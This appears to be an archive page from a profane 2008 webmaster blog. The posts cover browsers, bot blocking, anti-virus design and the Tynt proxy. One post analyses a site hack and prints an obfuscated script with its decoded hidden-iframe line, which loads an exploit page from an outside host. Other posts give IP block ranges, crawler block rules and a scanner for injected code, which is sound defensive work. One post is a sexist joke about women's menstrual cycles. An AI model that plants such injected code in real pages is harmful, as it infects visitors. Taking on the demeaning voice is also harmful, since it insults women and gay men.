Thursday, September 11, 2008

Exploring The Tynted Web

Here we go with Tynt, yet another startup trying to socialize the web.

Joy.

Yesterday there was a little bit of a flap about Tynt as they're running a wide open proxy on tynted.net that allows page hijacking in the search engines.

Today Tynt responded on their blog to the SEO community.

First, we understand that Tynt has the potential to impact the major search engines in ways that were detrimental to the sites being Tynted. Our community recommended blocking spiders from crawling Tynts through the use of a Global Robots Exclusion file (robots.txt) as well as other techniques to minimize the problem. We have already implemented the ROBOTS.TXT file and are working on additional solutions.
That's a noble effort but now anyone running AdSense, YPN or any other contextual ad network is shit out of luck because the network's bot has to visit the page to serve up the ads. This turns out to be a moot point because allowing the bot also makes the ads go to shit for other reasons explored below.

I think Tynt is missing the point that their proxy server is wide open and can be used by scrapers and other online vermin to access your site even though they might be blocked by other means.

Here, try it with Google or Yahoo or whatever you want: it's wide open, works for anyone and is ripe for abuse, including phishing expeditions. Very nice.

Shouldn't that proxy only work for registered members that are currently logged in?

Just a thought, I know it's beta and you want to demo some pages, but put a unique key in the URI so that only pages requested by actual Tynt members work with the proxy and it can't be randomly exploited.

For instance, instead of allowing the raw path "google.com.tynted.net" maybe it should be "google.com.someuniquekey.tynted.net".
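
One way the unique key idea could work is to derive the key from the member and the target host with an HMAC, so the proxy can verify it without a database lookup. This is only a sketch under my own assumptions: the secret, the function names and the idea that the member ID comes from a logged-in session are all hypothetical, and nothing here reflects how Tynt actually builds its gateway.

```python
import hashlib
import hmac

# Hypothetical server-side secret; a real deployment would keep this out of source.
SECRET = b"example-secret"
PROXY_SUFFIX = ".tynted.net"


def make_key(member_id: str, target_host: str) -> str:
    """Derive a short key tying one member to one proxied host."""
    msg = f"{member_id}:{target_host}".encode()
    return hmac.new(SECRET, msg, hashlib.sha256).hexdigest()[:16]


def proxied_host(member_id: str, target_host: str) -> str:
    """Build a host name of the form <target>.<key>.tynted.net."""
    return f"{target_host}.{make_key(member_id, target_host)}{PROXY_SUFFIX}"


def is_allowed(host: str, member_id: str) -> bool:
    """Accept only <target>.<key>.tynted.net hosts whose key checks out."""
    if not host.endswith(PROXY_SUFFIX):
        return False
    # The last label before the suffix is treated as the key.
    target, _, key = host[: -len(PROXY_SUFFIX)].rpartition(".")
    if not target or not key:
        return False
    return hmac.compare_digest(key, make_key(member_id, target))
```

With a check like this the raw "google.com.tynted.net" path fails, because "com" gets treated as the key and doesn't match anything.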

BTW, pass through the actual end user in your HTTP_X_FORWARDED_FOR field as we don't really find the NAT addresses of your internal servers all that useful.

Moving right along...

On their Twitter bio it says:
Tynt lets you put contextual relevance and dialog on web pages for sharing and interaction.
Listen, if I want dialog on my web pages, I'll put a comments section on the bottom of the pages, I don't need or want your help in this matter.

They clarify this further on the Tynt FAQ page:
Q. What kind of 'stuff' can I put on top of a web page?
A. There is a bunch of different things that you can do to a web page ranging from tools for research like sticky notes and highlighting text, to more fun stuff like text, speech bubbles, graphics and animations. Tynt is a fabulous tool for in context editorializing; in other words, Tynt lets you say what you think right on top of the topic you are talking about.
Let's see, what does putting things on top of a web page mean? Vandalism, graffiti and lampooning quickly come to mind, something every business online welcomes. Several examples on their site actually show exactly this so no thanks, I think I'll keep my site out of your "stuff".

Wait, it gets even better, we get to foot the extra bandwidth bill for the privilege of letting the Tynt users download our pages just to draw horns and funny faces on our site. Fuck that.

Besides, if you Tynt a blog, forum, or twitter you're actually taking away from the value of those social mediums by breaking up and disjointing the conversation into multiple places which adds no value to the original discussion.

Here's another precious gem from the Tynt FAQ page:
Q. Does Tynt steal my traffic and therefore my revenue?
A. All Tynted web pages, including images, ads and other media all load live from the originating web server so every time a Tynt is viewed the Tynted web site get the ad revenue and traffic.
Holy misconception and major bullshit alert Batman!

Anyone using a context sensitive advertising medium like AdSense and YPN will be in trouble. This is because AdSense and YPN don't know the page's context under the tynted.net domain name, so they show a bunch of off topic garbage which won't interest the person viewing the page whatsoever.

Want proof?

Let's use a Google AdSense case study site called CoolChaser just to see how well the ads work before and after you run the site through Tynt.

The results we saw were priceless:

Gay Bears Chat anyone?

That's just what my visitors crave, they love big hairy men that like other big hairy men and just can't keep their hands off of them - NOT.

As a matter of fact, something like this happening on a family friendly website could cause a huge problem but we won't delve into those issues at the moment.

Sorry, nothing about your Beta causes this problem as this is how AdSense responds over most any proxy and even in their own cache pages so anyone relying on AdSense or YPN revenue that has traffic redirected through Tynt's proxy will probably just lose out.

One of the Tynters tweeted me:
iancheung @IncrediBILL Tynt drives more people to sites and since people make money by ad views, it actually increases revenue.
I don't see how increased revenue is possible since you can't even see the ads because they're covered up with all those goddamn sticky notes!

From the blog:
Second, site owners have requested the ability to opt-out of having their sites publicly Tynted. We’ve given this a great deal of thought...
I gave it 2 seconds of thought and blocked your IP ranges:
Tynt Multimedia Inc. (TYNTM)
204.244.109.240 - 204.244.109.247
204.244.120.176 - 204.244.120.183
Out of site, out of mind, not a problem.
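
If you'd rather do the blocking in application code than at the firewall, the two ranges above can be checked with Python's standard ipaddress module. This is a minimal sketch; the function and variable names are mine, and the ranges are simply the ones listed above as of this writing.

```python
import ipaddress

# First and last address of each range listed above.
BLOCKED_RANGES = [
    ("204.244.109.240", "204.244.109.247"),
    ("204.244.120.176", "204.244.120.183"),
]

# Collapse each first-last pair into the CIDR networks that cover it.
BLOCKED_NETWORKS = [
    net
    for first, last in BLOCKED_RANGES
    for net in ipaddress.summarize_address_range(
        ipaddress.ip_address(first), ipaddress.ip_address(last)
    )
]


def is_blocked(remote_addr: str) -> bool:
    """Return True if the visitor's address falls inside a blocked range."""
    addr = ipaddress.ip_address(remote_addr)
    return any(addr in net for net in BLOCKED_NETWORKS)
```

Both ranges happen to line up on /29 boundaries, so each one collapses to a single network.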

But wait, they have more in store:
The reason for the gateway (and the different looking URL) is to allow us to insert the JavaScript which loads the Tynt engine for the in-context comments and conversations (and hey, if everyone installs the plug in, then there is no need for our gateway and we can save ourselves the bandwidth and effort there too!).
The end users will be doing the page loading and we'll be unable to see them or stop them from fucking with our pages.

Many webmasters take their livelihoods and reputations very seriously and don't like being fucked with so there needs to be a way to detect the use of Tynt and/or a way to opt-out of Tynt before this happens or it could get very ugly.

Last but not least, Tynt has made no mention of how they plan to make money.

Do you ultimately plan on using our sites to trigger your ads?

That's when the shit will really hit the fan.

Have a nice week.

Sunday, September 07, 2008

2008 a Chrome Odyssey

Did Stanley Kubrick join Google marketing?

Ever since Chrome was released it's been like watching the online monkeys beat the monolith with bones like the intro of 2001: A Space Odyssey.

Sometimes people just make me want to smack them upside the head the way Gibbs dishes it out to DiNozzo on NCIS.

First, Google releases a beta product and everyone starts reviewing it like it's a finely polished shipping product. For those of you not in the software business there are various levels of beta which typically evolve into final beta, meaning that all features are frozen for that release. Then comes a beta gold candidate which appears to be as bug-free as possible and is about to become a shipping product. The initial release of Chrome is an obvious real beta that they want feedback on so get over it, it's an early beta, it's nowhere close to a final beta IMO but it's a damn good first release.

Second, a whole bunch of people are trying to steal Google's thunder comparing it to MSIE 8 primarily, which is also still in beta. If Google didn't already have those features coded then they wouldn't be in their initial beta either. It's not like someone at Google woke up on a Monday, read the MSIE 8 feature list, and wrote a whole bunch of new features for Chrome that just showed up in the release on Tuesday, get real. Most of those features were obviously in the works for quite some time but MSIE 8 was publicly known as opposed to the closely held secrets of Chrome.

Thirdly, it's mostly just desperate cries for attention and link bait for people that have nothing better to do than bash Google on a good day and now there's more fuel for the fire.

Just remember, the first version of Firefox wasn't much to write home about which was initially distressing considering its Netscape heritage, but it got better in a hurry until they bloated up Firefox 3, what a slug.

Additionally, Chrome is built on the same rendering engine that runs Safari so it has a lot of history already and should be pretty solid except for its handling of some plug-ins which will be fixed.

Overall, I'm hopeful that Chrome gets the bugs patched quickly because I love the speed and snappy page displays like you get with Opera without all the javascript quirks.

I just hope it ships with add-on capability or more JavaScript control like Firefox's NoScript and I'll be a happy boy.

Remember people, it's JUST BETA, give them a chance to polish it up.

Tuesday, September 02, 2008

Chrome Shines While Fat Lady Sings for Opera, Firefox and MSIE

I'm very hard to impress, an old school hard core programmer that detests software bloat from lazy assed programmers using poorly implemented cross-platform development environments.


I like fast and lean code, shit that makes an old laptop look all shiny and new and maybe that's why Google named their new browser Chrome 'cause this fucker shines.

It was only yesterday that I threw my hands up in the air and ran screaming from Firefox 3's latest fat, bloated leaky slower than shit browser and declared Opera was one hell of a fast alternative.

Unfortunately, for all of Opera's speed there were a few quirks that meant it wasn't a 100% solution after all, starting with the fact that some javascript in Horde Webmail (used in Plesk) had a few problems so it was only 95% usable, still workable and not a show stopper.

The show stopper was that Opera's copy & paste was unable to properly render text to an HTML editor, as the full HTML content that had been copied from a web page was stripped down to plain text. Plain text is expected when you paste into something like Notepad, but not when you paste into an application that is capable of negotiating the data type and wants to receive the full HTML content from the browser.

For us old school Windows programmers this is CLIPBOARD 101 kind of shit and Opera failed the class miserably.

Guess what?

Google Chrome in BETA didn't have the javascript glitches in Horde Webmail and it knows how to properly paste HTML text, something Opera has had years to perfect.

Both Opera and Chrome are fast but the devil is in the little details and so far Chrome is in league with the devil.

OK, Chrome doesn't ship with Java, appears to crash with Quicktime (who gives a shit besides Apple and all their cultists) and has a few other plug-in problems, but for a BETA it's fucking phenomenal, it's DA BOMB!

Although I have to ask Google one simple question:

Where's the goddamn TITLE bar and the STATUS bar?

Don't make me drive down to Mtn. View and teach you Windows 101 coding, come on, these should've been there from the get go.

Other than that little peeve, and the lack of the security control given by Firefox add-ons like NoScript, I'm totally stoked. I'll cut Google some slack and assume they'll remedy the missing title and status bar, include Java, fix the Quicktime crash, etc. and provide more control over javascript.

Google, a damn fine first showing, hats off, kudos, just fix the rest of this and I'm a solid Chromer for life.

BTW, I'm posting this using Google Chrome so this fucker does work.

YEEE HAW!

Monday, September 01, 2008

Opera 9.5 Smokes Firefox 3

The latest Firefox 3 upgrade was just pitiful and the memory footprint was fatter, it seemed to be leaking memory, page loads just crawled at a snail's pace, it was an overall hog.

The options were limited:

- Go back to MSIE 7, which isn't much better, or

- Give Opera one last try as I've always found something that stopped me from using Opera in the past.

Well, the first thing I noticed is Opera 9.5 is faster than shit and loads some pages 3x-5x faster than Firefox, especially my own blog which makes Firefox choke. The second thing I noticed was the footprint of Opera 9.5 is about half that of Firefox when it loads and operates.

Seriously, Opera loaded pages so much faster than Firefox it felt like I was using a new computer!

So now I'm going to give Opera a try and see if there are any gotchas that will stop me from using it but so far it's looking really good and I may just be the next Opera convert!

BTW, this blog post is my first in Opera!

Sunday, August 31, 2008

MJ12BOT's Dirty Little Secret

Many of you have seen MJ12bot hammering your site from IPs all over the world, both the legit crawler and the fake virus version 1.0.8 as well.

"Mozilla/5.0 (compatible; MJ12bot/v1.2.3; http://www.majestic12.co.uk/bot.php?+)"
Everyone likes an underdog and we tolerate these crawlers when they claim such a noble purpose:
We do spider the Web for the purpose of building a distributed search engine with fast and efficient downloadable distributed crawler that will enable people with broadband connections to help contribute to, what we hope, will become the biggest search engine in the world.
It's been crawling for years and I've never seen any traffic from this damn thing, has anyone?

Then the "offshoot" of this so-called search engine emerges, which is Majestic SEO, which claims to be "a commercial offshoot from Majestic-12".

What do they do with the data gathered when they crawl your site?

Here's a direct quote, including typos and bad grammar:
competitive reports are now avaialble, you can buy credits and then use them to see information any domain!
So let's get this right, if we let you crawl our server then you'll let our competitors buy information that can be used against us?

We have a simple solution to this distributed problem:
RewriteCond %{HTTP_USER_AGENT} MJ12bot
RewriteRule .* - [F]
Compete with that.
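
For anyone not running Apache, roughly the same check can be done in application code. This is just a sketch with names I made up, and unlike the rewrite rule above it ignores case, which is my own choice and not part of the original rule.

```python
import re

# Pattern for the crawler name; case-insensitive by choice (the Apache rule above is not).
BLOCKED_AGENTS = re.compile(r"MJ12bot", re.IGNORECASE)


def status_for(user_agent: str) -> int:
    """Return 403 for blocked crawlers and 200 for everyone else."""
    return 403 if BLOCKED_AGENTS.search(user_agent or "") else 200
```

Call status_for() with the request's User-Agent header before doing any real work and send the 403 straight back when it matches.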

FireFox 3 Bloated Leaky Pile of Shit

Firefox 3 with all its much anticipated upgrades turned out to be a big fat flop that's annoying me to the point I'm thinking of switching back to Internet Explorer or giving Opera a try.

Some of the new features seem interesting but overall it's slower, bloated, and appears to be leaking faster than the Titanic after a close encounter with an ice cube.

The damn thing starts at about 40MB and just grows and grows.

Here I'm sitting with a lousy 2 tabs open after using it for a while and it's holding 100MB of memory and not releasing it.

Maybe it's one of the 2 plug-ins I'm using causing the leaks, who knows, but this hog is almost intolerable as it just grows and grows.

Ah well, you gave it a good run Mozilla, time to look elsewhere.

Sunday, August 24, 2008

Woman Weather Channel

During a discussion with a few of my male friends today it became obvious that some of us could benefit from such an online service.

You could have a widget, perhaps a Google Gadget even, sitting on your desktop that declares your woman's current menstrual state such as:

Today: Slightly Spotty
Then you could click on the widget and look at the 5 day forecast and see what's in store for the week:
Mon: Spotty
Tue: Heavy Flow
Wed: Flow
Thu: Spotty
Fri: Clear
Obviously the paid version I'm tentatively calling "Wife Alert" could also send potentially life saving text messages to your cell phone at appropriate times.

It's 6am on that fateful morning when the text message alarm chirps:
"PMS EMERGENCY! THIS IS A HEAVY FLOW DAY! FORGET THE CHILDREN, GET OUT NOW AND SAVE YOURSELF BEFORE IT'S TOO LATE!"
Perhaps even an advance warning system with even more important information such as converging events that could spell disaster if you fuck up.
"WARNING - HEAVY FLOW AND BIRTHDAY BOTH COMING IN 3 DAYS. DON'T FORGET FLOWERS, PRESENTS AND PARTY AS YOUR LIFE COULD DEPEND ON IT!"
Considering how much physical and mental abuse this could potentially save men, it's even possible your health insurance company would pick up the tab for "Wife Alert" as a standard health benefit.

Just like how the weather channel allows you to look up the weather of other locations around the world, the Woman Weather Channel would allow you to look up celebrities online.

Could you imagine tuning in to watch The View when you knew two of the hosts were going to have a bad day at the same time?

The Woman Weather Channel could also be an indispensable resource for anyone in business or politics that could simply avoid any bosses, colleagues or co-workers known to be having a "bad day" until her weather report showed all clear.

The possibilities are endless so tune into the Woman Weather Channel today and all you husbands subscribe to "Wife Alert" as it could be your life it saves!

Thursday, August 14, 2008

How Flawed is Your Anti-Virus?

Some of the anti-virus web surfing protection products are permitting some very risky behavior due to flaws in their basic design. For instance, some of them allow your browser to willingly go to known bad locations they have in their database until something catastrophic gets downloaded. Once the file is downloaded it might be too late so there's the real problem.

Here's a quick for instance, the site "gcounter.cn" was found in an Invisible IFrame launcher yet the page with that code was deemed safe. However, when you go to gcounter.cn, which you should NOT go to as it's very bad, it downloads a wide variety of things or randomly redirects you to Google of all places. That redirect to Google is probably tossed in there to throw people off the path trying to figure out if this is the source of the virus, but that's another story.

Anyway, several anti-virus and link scanning products just ignored the fact that this site is known to be bad and let me visit these pages without so much as a warning. Better yet, when I fed some infected pages directly into my browser just to see what happened, they couldn't detect the Invisible IFrame launcher script properly, and even when they did, didn't stop me from running the page at that time or even pop a warning!

Why?

Because gcounter.cn, like many other malware sites, wasn't downloading a bad file at that particular instance. However, a few minutes later the malicious files were flowing from gcounter.cn again and then the anti-virus woke up, finally.

Shouldn't the fact that gcounter.cn downloads any malware be enough of a reason to set off some alarms and stop people dead in their tracks from going there?

Apparently not.

It appears that hackers have a leg up on spoofing the malware scanning software and the anti-virus developers so it's no wonder that machines are getting hacked all over the place.

Although the anti-virus products do add some value to protecting surfers they unfortunately cause more harm than good by giving a false sense of security. With the massive gaping holes in their technology the only true way to surf safe is using NoScript since no javascript whatsoever means no Invisible Iframe launcher tricks.

I'm not going to name which anti-virus products I tested at this time because I'd like to give them time to fix their products before exposing their shoddy methodologies and putting their customers at risk of being more of a target than they already are.

Come on anti-virus writers, get your shit together before I lose my shit and do a real expose!

Addendum:

The one interesting twist in the Invisible Iframe launcher script that I found this time is that it was injected into a common javascript file shared site wide instead of just being inserted into the home page. This is a nasty strategy twist that gives the hackers a bigger bang for their buck by getting more infected pages with a lot less work and the code isn't in the HTML file which is where most people would look first.
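
Since the code can hide in shared script files, it's worth sweeping the whole site and not just the home page. Here's a rough sketch of such a sweep; the two patterns (an eval(unescape(...)) wrapper and an iframe styled display: none) are my own guesses at typical launcher markers, the names are made up, and any half-competent hacker can dodge a pattern match like this, so treat a clean result as nothing more than a hint.

```python
import re
from pathlib import Path

# Illustrative markers only; real launchers vary and can be obfuscated further.
SUSPICIOUS = [
    re.compile(r"eval\s*\(\s*unescape\s*\(", re.IGNORECASE),
    re.compile(r"<iframe[^>]*display\s*:\s*none", re.IGNORECASE),
]


def looks_infected(source: str) -> bool:
    """Return True if the text contains any of the suspicious markers."""
    return any(pattern.search(source) for pattern in SUSPICIOUS)


def scan_tree(root: str, suffixes=(".js", ".html", ".htm", ".php")) -> list:
    """Walk a site directory and list files that contain a marker."""
    hits = []
    for path in Path(root).rglob("*"):
        if path.is_file() and path.suffix.lower() in suffixes:
            text = path.read_text(errors="replace")
            if looks_infected(text):
                hits.append(str(path))
    return sorted(hits)
```

Note that .js is in the suffix list on purpose, because that's exactly where this round of injections was hiding.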

Thursday, July 24, 2008

SEO Community in TailSphinn

I tried to support Sphinn's efforts by putting the SphinnIt button on my site to help raise awareness of what they were trying to do with something unique for the SEO community.

Unfortunately, Sphinn devolved into a bunch of Sphamm and when one of their members pointed out how widespread the problem was they banned Edward. OK, Edward (pageoneresults) can push the envelope a little but it wasn't out of disrespect, he was making a very public spectacle to get them off their dead asses to fix the problem.

So EvilGreenMonkey of Sphinn even admitted Edward was right:

The person highlighted in Aaron's post has had their account terminated, there is no need to interact with them further. The findings highlighted in his comments were not new or truely condemning. Yes, people spam Sphinn - we remove the spam. Yes, submit.php URLs were getting indexed - although from Google indexing WP social media plugin links rather than spamming. Fixes to these problems were either already implemented or scheduled for release before said user started his campaign. I'll make no further comment on this post and suggest that we leave it at that.
So instead of saying "Thank you for bringing it to our attention" and "We're working on the problem" with a proposed implementation date, they just ban him and that's when all hell broke loose in the SEO blogosphere.

Not only that, shouldn't the Sphinn members get an apology from Sphinn for forcing us to suffer through all that Sphamm which one simple NOFOLLOW would've stopped from the beginning?

Perhaps Sphinn bears some of the blame here because if "his comments were not new or truely condemning" then you allowed the situation to continue unabated until one of your members simply couldn't take it anymore.

So Sphinn members had to put up with Sphamm for a year and not even a simple apology but they shot the messenger that finally snapped, good going Sphinn.

Right on the heels of this they decide to take a swipe at Kimberly Bock and threatened to ban her for some hypocritical horseshit.
1. Your flame post submitted by another user, which went Hot on Sphinn, was removed due to 26 Desphinns and many complaints.
2. The posts about your personal life had no internet marketing relevance and are seen as off-topic/spam.
So let's review Kimberly's plight as she was a) threatened over a post that someone else submitted to Sphinn and b) told that 2 SEOs getting married isn't news.

Holy mother of horseshit, have they lost their minds?

I find their current heavy handed reputation management tactics too autocratic to support Sphinn anymore simply because the good of the community isn't being served when criticism is swept under the rug and squelched instead of addressed.

The Sphinn button is off my site because I certainly wouldn't want to be associated with all the vapid top 10 lists being submitted and I sure as hell don't want someone yelling at me about material on my site not being suitable in the event someone else Sphinns it, such as happened to Kimberly.

Maybe someday if Sphinn gets their act together and stops shooting the messengers and they improve the quality of their content, the SphinnIt button will return.

Until that day, SphuckIt!

Sunday, July 06, 2008

iPowerWeb Hacking Continues

Over a year ago I wrote about a bunch of iPowerWeb's shared servers being hacked, and it looked like they were trying to clean it up, but now it's time for round two of hacking.

The latest batch of hacked sites may have a DNS hack as well, I'm not sure that's the case but Alex seems to think it is.

All these sites have the following Whois Name Server entries:

Name Server: NS1.IPOWERDNS.COM
Name Server: NS1.IPOWERWEB.NET
Sure looks like iPowerWeb, right?

But the reverse DNS all goes to IPs on *.static.eigbox.net which links to BIZLAND

Here's a sample of the javascript in this round of site hacking:
eval(unescape("%77%69%6e%64%6f%77%2e%73%74...."));
Don't go to the link below if you know what's good for you, it's not safe.

The javascript above, when decoded, is the following:
window.status='Done';document.write('<iframe name=f2f8f656791 src=\'http:// 58.65.232.*/gpack/index.php?'+Math.round(Math.random()*74880)+'2\' width=480 height=156 style=\'display: none\'></iframe>')
You guessed it, bad things happen at 58.65.232.33 which APNIC claims to be hostfresh.com out of Hong Kong which has a San Francisco mailbox according to their website.
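
If you want to decode this kind of thing without letting a browser anywhere near it, the %XX escapes can be unpacked offline. A minimal sketch, assuming the payload only uses plain %XX escapes (JavaScript's unescape also understands %uXXXX, which this does not handle); the function name is mine.

```python
from urllib.parse import unquote


def decode_js_unescape(payload: str) -> str:
    """Decode %XX escapes the way JavaScript's unescape() treats them."""
    # latin-1 maps each %XX byte to the code point of the same value.
    return unquote(payload, encoding="latin-1")


# The visible part of the truncated sample above.
print(decode_js_unescape("%77%69%6e%64%6f%77%2e%73%74"))  # prints: window.st
```

The result is just a string, nothing gets executed, which is the whole point.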

Can someone explain why this exploit site still exists if these guys are doing business with a US address and all hell isn't raining down on their parade?

I don't get it, the web has gone mad...

Tuesday, June 17, 2008

AVG 8 LinkScanner Fiasco Recap

For those of you that might've missed the whole AVG 8 LinkScanner disaster and ensuing AVG reputation nightmare, here's a quick recap and links to places to read all the details.

Webmasters started noticing a rash of distributed IPs with the same user agent, no referrer, and a few other technical issues I won't go into now, that suddenly started pounding their sites:

Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;1813)
At first I thought it looked like a botnet scraper but soon someone figured out it was related to the new release of AVG 8 that included a LinkScanner that was amusingly called "Safe Search" which is now not-so-safe since everyone knows how to spoof it.

The story was first broken on WebmasterWorld, then again on The Register, then a follow up on WebmasterWorld and a few other places. The best part of the story on The Register actually unfolds in the comments section which is now over 200 posts but has some good comments if you're willing to wade through it all.

It appears this Safe Search link scanning was a knee jerk reaction to McAfee's SiteAdvisor. SiteAdvisor uses stale search results to flag sites with known exploits. However, Safe Search, much to everyone's dismay, hits all sites in real-time to check for exploits for every single search. The most amusing aspect is that the very AVG feature which is supposed to make the internet safer has been attacking sites and become malware itself.

Here's a list of all the major points so far:

1. AVG 8 appears to be causing an escalating DDoS attack as more and more AVG users upgrade causing some sites to be hit by many thousands of unique IPs per day.

2. AVG's Safe Search is causing webmaster analytics worldwide to be totally skewed unless you filter out the ";1813" user agent.

3. AVG 8 is exposing their customer information to sites their customers didn't even visit and potentially setting them all up for some future exploit. They'll be targets for direct marketing to switch to a new AV product at a minimum with savvy affiliates making out like bandits.

4. The Safe Search link scanner has the potential to automatically access sites that aren't allowed at work, could violate your ISP's AUP or be illegal in some jurisdictions. This could result in reprimand, losing your ISP or potentially being flagged in honeypot sites for illicit activities.

5. The malicious sites can already fake the Safe Search code which appears to put users of the free AVG 8 at risk. The risk is because you only get Safe Search, the link scanner which is being spoofed, but you don't get Safe Surf, which stops HTML exploits as you load the page. It appears you need a paid version of AVG 8 to actually be protected from online exploits so be careful where you surf using the free version of AVG 8.
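
On point 2, filtering the ";1813" user agent out of your logs before feeding them to analytics might look something like the sketch below. It assumes Apache combined log format, where the user agent is the last quoted field, and the function names are mine. Keep in mind the marker is trivial to spoof and AVG could change it at any time.

```python
AVG_MARKER = ";1813)"


def is_avg_linkscanner(user_agent: str) -> bool:
    """Return True if the user agent ends with the AVG LinkScanner marker."""
    return user_agent.rstrip().endswith(AVG_MARKER)


def human_hits(log_lines):
    """Yield combined-log-format lines whose user agent lacks the AVG marker."""
    for line in log_lines:
        # The user agent is the last quoted field, so split on the last two quotes.
        parts = line.rstrip().rsplit('"', 2)
        user_agent = parts[1] if len(parts) == 3 else ""
        if not is_avg_linkscanner(user_agent):
            yield line
```

Run the raw log through human_hits() first and hand only what comes out to your stats package.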


Well, that's the recap in a nutshell.

This just goes to show you how the best intentions can have disastrous results when people don't think about the consequences of their actions, especially when dealing with an installed base of this scale.

Thursday, May 22, 2008

Did CSC's Spybot Get Caught?

Looks like yet another corporate compliance spybot is hitting our servers, not like we need yet another spybot.

There's only one IP out of this entire range that consistently hits my servers.

OrgName: Corporation Service Company
OrgID: CORPO-9-Z
NetRange: 165.160.0.0 - 165.160.255.255

They claim to crawl the web:

Our proprietary technology scans and digests web pages, images and other Internet content around the clock to locate critical occurrences of online brand abuse.
Yet again, nobody has ever seen a crawler name in use so I'll hazard a guess it doesn't read or respect robots.txt when it's crawling, or possibly trespassing, on our servers.

I'd post more about the specifics on this one but I really don't want them to wise up too much because some of the things their crawler does, while pretending to be a browser, trips several alarms in my bot blocker.

Kind of hard to digest web pages when you're busy digesting error pages instead!

Just another day of the internet version of Spy vs Spy.

Monday, May 12, 2008

Impact On Your Bandwidth Will Be Minimal My Ass

How often do we see that happy line of horse shit spread by every new startup that crawls the web about how minimal its impact will be?

Every fucking one of them claims it but when you add them all together the bot traffic is quickly exceeding the human traffic.

Who the fuck am I kidding, on most sites the bots clearly outnumber the humans in pages read on a daily basis.

First we put the big search engines on top of the heap with Google, Yahoo and MSN crawling the crap out of your servers daily. Just the three of these guys can easily read as many pages as 10K visitors a day. Then throw in the wannabe search engines like Ask, Gigablast, Snap, Fast, etc. ad nauseam and it's over the top.

Now expand that list to include the international search engines like Baidu, Sogou, Orange's ViolaBot, Majestic12, Yodao, and on and on, tons of 'em.

Then we have all the spybots that feel entitled to crawl your site like Picscout, Cyveillance, Monitor110, Picmole, RTGI, and on and on.

Next add up all the specialty niche bots like Become, Pronto, OptionCarriere, ShopWiki, and all sorts of shit too numerous to mention.

Pile on top of this all the free fucking tools that every little shithead and make believe company uses to scrounge the 'net for god knows what, and god's not telling, like Nutch and Heritrix, plus the web downloaders, offline readers, and more.

Don't forget, many of these so-called search engines and shit now want screen shots as well so after they crawl your page they send a copy of Firefox or something to your site to download every page again plus every fucking image, never cached, over and over and over.

Did I forget to mention directories?

They'll want to link check you and get screen shots as well, don't leave them out or they'll feel fucking neglected.

Wait, there's more, those social sites like Eurekster, Jeteye, etc. that let people link to your shit and then come back banging on your site all the time to make sure that shit's still valid.

Then add up all the RSS feed readers and aggregators that pull down your RSS feeds that nobody ever fucking reads. Not to mention the RSS feed finders like IEAutodiscovery that run amok on your site just looking for RSS feeds ... FUCK!

If you run affiliate programs you have CJ quality bot or some shit hitting your site and if you run ads then the Google quality bot, it's always something.

Don't forget the assholes running the dark underbelly of the web with all the scrapers, spam harvesters, forum, blog and wiki spammers, botnets and other malicious shit pounding on our sites daily.

Add on top of all this shit Firefox, Google Web Accelerator and now AVG's toolbar all pre-fetching pages that will most likely never be read and holy shit, we're being swamped!

OK, now that we've identified all this bot traffic, where's all the fucking people?

Of course you think all those hits from MSIE and Firefox are people, right?

Hell no!

Are you out of your fucking mind?

Those hits are the scrapers, screen shot makers and companies like Cyveillance and Picscout that don't want you to stop them from crawling your site so they just pretend to be humans to get past the bot blockers.

Well guess what?

There are no fucking people on your site. The internet is now run for and used exclusively by bots.

Apparently you missed the memo.

Comparing Effectiveness of Anti-Virus Web Protection Methods

There are three basic methods being used at the moment to protect web surfers from potential dangers: static (stale), active and passive.

Static Web Protection

Various companies use the static method, which relies on crawling the web in advance to find vulnerabilities and then attempts to warn visitors about these problems as they are about to visit a web site. McAfee's SiteAdvisor and Google both take this approach. It's obviously only as good as the last scan, and the malware can easily be cloaked and hidden from these somewhat obvious crawlers. Besides being easily fooled by cloaking, the data is always stale, meaning sites that were good even 10 minutes ago could now be infested with malware and sites previously infested could have been cleaned.

This method isn't optimum for anyone and can be a nightmare for websites tagged as bad to get off the warning list assuming they ever find out they're on it in the first place as their business goes down in flames from traffic going elsewhere.

Active Web Protection

The latest AVG 8 includes a Link Scanner and AVG Search-Shield which aggressively check pages in Google search results that you're about to visit in real time to help protect the surfer. Unfortunately, AVG made several mistakes, some that could be deemed fatal flaws, which allow this technology to be easily identified so that malware and phishing sites can easily cloak to avoid AVG's detection. Even worse for webmasters is that AVG pre-fetches pages in search results and, as adoption of this latest AVG toolbar increases, it is quickly turning into a potential DoS attack on popular sites that show up at the top of Google's most popular searches.

While I think AVG's intentions were good, their current implementation easily identifies every customer using their product and causes webmasters needless bandwidth issues that could be easily resolved on their part with a cache server.

Passive Web Protection

The method used by Avast's Anti-Virus is to use a transparent HTTP proxy, meaning that all of your HTTP requests pass through an invisible intermediate proxy service that scans for potential problems in the data stream in real-time. The data is always fresh, checked in real-time, the user agent doesn't change and there are no pre-fetches or needless redundant hits on websites.

The only downside is you don't know the site is bad in advance but that can easily be the case with static protection due to stale data and/or cloaking and active protection due to cloaking.


The Best of All


While the three approaches all have their potential problems it appears a combination of all three is probably the best approach.

Bad Site Database:
The SiteAdvisor/Google type database approach is good to log all known bad sites so they don't get a second chance to fool the other methods with cloaking once they are caught. This cuts down on redundantly checking known bad sites until the webmaster cleans it up and requests a review to clear their site's bad name.

Perhaps the Bad Site database concept needs to become a non-profit dot org so that all of the anti-virus companies can freely feed and use this database without all the corporate walls built up around the ownership of the data for the greater good, something like a SpamHaus type of thing or perhaps merged into SpamHaus.

Optimized Pre-Screening:
The AVG approach of pre-screening a site could be optimized by fixing the toolbar's user agent so it's not detectable and using a shared cache server to avoid behaving like a DoS attack on popular websites. The beauty is that the collective mind of all these toolbars with an undetectable user agent avoids the cloaking used to thwart detection associated with known crawlers. If the toolbar fed the results of these bad sites to the Bad Site Database, then there's a win-win for everyone.

Transparent Screening:
The final approach used by Avast should still be performed, which is the HTTP proxy screening, so that any site that manages to not be in the bad site database and still eludes the active pre-screening of pages would hopefully get snared as the page loads into the machine.
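A rough sketch of how the three layers could be chained, purely for illustration. The names `screen_url`, `bad_sites`, `prescreen` and `scan_stream` are hypothetical and don't correspond to any vendor's actual product; the two checker functions are stand-ins you'd have to supply yourself.

```python
from typing import Callable, Set


def screen_url(host: str,
               bad_sites: Set[str],
               prescreen: Callable[[str], bool],
               scan_stream: Callable[[str], bool]) -> str:
    """Return which layer flagged the host, or "clean".

    bad_sites   -- shared database of known bad hosts (static layer)
    prescreen   -- returns True if a pre-fetch finds a problem (active layer)
    scan_stream -- returns True if the proxy scan finds a problem (passive layer)
    """
    if host in bad_sites:
        return "blocked: known bad site"
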